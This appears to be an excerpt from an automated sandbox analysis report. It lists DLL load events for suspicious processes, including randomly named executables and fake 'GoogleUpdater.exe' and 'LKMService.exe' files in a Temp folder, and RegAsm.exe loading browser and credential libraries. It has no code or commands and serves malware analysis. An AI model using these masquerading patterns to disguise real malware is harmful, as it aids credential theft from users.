                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeSection loaded: version.dll
                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: gpapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: propsys.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edputil.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.staterepositoryps.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: appresolver.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcp47langs.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: slc.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sppc.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pcacli.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: gpapi.dll
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                            Source: C:\Users\userCGHCGIIDGD.exeSection loaded: mscoree.dll
                            Source: C:\Users\userCGHCGIIDGD.exeSection loaded: apphelp.dll
                            Source: C:\Users\userCGHCGIIDGD.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\userCGHCGIIDGD.exeSection loaded: version.dll
                            Source: C:\Users\userCGHCGIIDGD.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\userCGHCGIIDGD.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\userCGHCGIIDGD.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                            Source: C:\Users\userJEHDHIEGII.exeSection loaded: mscoree.dll
                            Source: C:\Users\userJEHDHIEGII.exeSection loaded: apphelp.dll
                            Source: C:\Users\userJEHDHIEGII.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\userJEHDHIEGII.exeSection loaded: version.dll
                            Source: C:\Users\userJEHDHIEGII.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\userJEHDHIEGII.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\userJEHDHIEGII.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: propsys.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edputil.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.staterepositoryps.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: appresolver.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcp47langs.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: slc.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sppc.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pcacli.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.fileexplorer.common.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntshrui.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: linkinfo.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: gpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: rasapi32.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: rasman.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: rtutils.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: sxs.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: winhttp.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: mpr.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: scrrun.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: propsys.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: rasadhlp.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: fwpuclnt.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: linkinfo.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: ntshrui.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: srvcli.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: cscapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: secur32.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: schannel.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: mskeyprotect.dll
